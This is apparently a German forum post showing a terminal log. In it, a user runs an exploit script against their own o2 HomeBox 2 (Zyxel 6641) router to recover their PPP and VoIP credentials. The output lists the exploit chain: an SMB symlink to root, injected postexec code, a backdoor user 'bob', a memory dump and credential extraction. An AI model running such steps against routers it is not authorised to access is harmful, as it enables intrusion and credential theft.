administi@administi-virtual-machine:~$ [B]ls[/B]
Bilder Downloads Musik Schreibtisch Vorlagen
Dokumente examples.desktop Öffentlich Videos
administi@administi-virtual-machine:~$ [B]cd Schreibtisch[/B]
administi@administi-virtual-machine:~/Schreibtisch$ [B]ls[/B]
6641-own-20150105-3.sh 6641-own-20150105-3.sh.zip ras.bin
administi@administi-virtual-machine:~/Schreibtisch$ [B]sh 6641-own-20150105-3.sh[/B]
[COLOR=#ff0000]Error:[/COLOR] You are not root. This script needs root permissions for mounting etc.
Please run in a root shell or use "sudo".
Usage: 6641-own-20150105-3.sh [host]
This script tries to help you "own" yout o2 HomeBox 2 (Zyxel 6641)
For certain parts of the script, root privileges are needed.
Please use sudo or run in a root shell!
administi@administi-virtual-machine:~/Schreibtisch$ [COLOR=#ff0000][B]sudo 6641-own-20150105-3.sh[/B][/COLOR]
[sudo] password for administi:
sudo: 6641-own-20150105-3.sh: [COLOR=#ff0000]command not found[/COLOR]
administi@administi-virtual-machine:~/Schreibtisch$ [COLOR=#ff0000][B]sudo ./6641-own-20150105-3.sh[/B][/COLOR]
sudo: ./6641-own-20150105-3.sh: [COLOR=#ff0000]command not found[/COLOR]
administi@administi-virtual-machine:~/Schreibtisch$ [B]sudo ./6641-own-20150105-3.sh[/B]
Please enter the IP address or hostname of your HomeBox 2 (Zyxel 6641)
or just press enter to use the default value
Host [o2.box]: [B]192.168.1.1[/B]
Please enter the registrar of your VoIP connection
or just press enter to use the default value
Registrar [sip.alice-voip.de]:
Please enter the sip-proxy of your VoIP connection
or just press enter to use the default value
SIP-proxy [sip.alice-voip.de]:
Please enter the phone numbers to search for.
Seperate numbers with space and use the format
CCPPPPPPPNNNN
or
0PPPPPPPNNNN
(CC=Country-Code, PPPPP=Prefix, NNNN=Number)
For example: 498005900050 498005251378 08005900050 08005251378
If you are not sure which format is correct for your account,
simply specify both formats for your phone numbers!
Phone numbers: [B]xxxxxxxxx (hatte selbst die Version 030123456 - z.B. für Berlin - eingegeben, aber keine weiterführenden Varianten. Das resultierte in "keine Voip-Passwörter gefunden")[/B]
- trying to ping the box (192.168.1.1)... SUCCESS
- trying to mount the box: //192.168.1.1/DRIVE1_1... SUCCESS
- trying to create symlink (0_link_to_r00t_42048) to root directory... SUCCESS
- trying to unmount /tmp/tmp.6BbssRBSQg... SUCCESS
- trying to mount the box a second time for exploit preparation... SUCCESS
- trying to append "postexec" code... SUCCESS
- trying to create a user called "bob" with password "alice" SUCCESS
- trying to unmount /tmp/tmp.6BbssRBSQg... SUCCESS
- trying to mount the box a third time for exploit execution... SUCCESS
- trying to unmount /tmp/tmp.6BbssRBSQg... SUCCESS
- checking for open port on 192.168.1.1:23000... SUCCESS
- dumping memory from box to usb drive
please be patient: this takes at least 62 seconds...
- trying to mount the box a fourth time to download the memory dump... SUCCESS
- trying to copy PPP username (<BOX-SERIAL>-CC5D4E@.*\.de), a failure here is OK... SUCCESS
- trying to copy PPP password (your PIN)...
If this fails, extraction of PPP data will fail! SUCCESS
- downloading the memory dump to /tmp/tmp.St84EHUPEB... SUCCESS
- trying to unmount /tmp/tmp.6BbssRBSQg... SUCCESS
- looking for phone number + proxy name in memory dump...
- No password for xxxxxxxxx found, retrying with sip proxy registrar..\.sip\.alice-voip\.de
- No password for xxxxxxxxx found
~~~~~~~~~~~~~~~~ FINISHED, RESULTS FOLLOW ~~~~~~~~~~~~~~~~
Your PPP (internet) login data is:
Username: [EMAIL="[email protected]"][email protected][/EMAIL]
Password: xxxxxxxxxx
Since I've found no VoIP passwords, I'm leaving the memory dump in
/tmp/tmp.St84EHUPEB/6441-own_memdump-11384.bin
intact for you to look into.
Since anything unter /tmp is usually a ramdisk, this should
not have any side effects, BUT YOU WILL LOOSE THE DATA ON REBOOT!